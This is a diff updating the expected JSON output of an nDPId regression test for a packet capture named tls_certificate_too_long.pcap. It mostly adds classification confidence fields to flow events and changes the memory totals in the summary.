+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1626168078653,"flow_last_seen":1626168079674,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080732,"flow_last_seen":1626168080762,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080092,"flow_last_seen":1626168080122,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1626168075664,"flow_last_seen":1626168076674,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":1180,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}}
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}}
 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077750,"flow_last_seen":1626168077780,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"}}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077750,"flow_last_seen":1626168077780,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
+00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075993,"flow_last_seen":1626168077017,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
 00175{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","total-events-serialized":217}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 315/315
@@ -223,9 +223,9 @@
 ~~ total active/idle flows...: 35/35
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4756648 bytes
-~~ total memory freed........: 4756648 bytes
-~~ total allocations/frees...: 100085/100085
+~~ total memory allocated....: 4830449 bytes
+~~ total memory freed........: 4830449 bytes
+~~ total allocations/frees...: 101675/101675
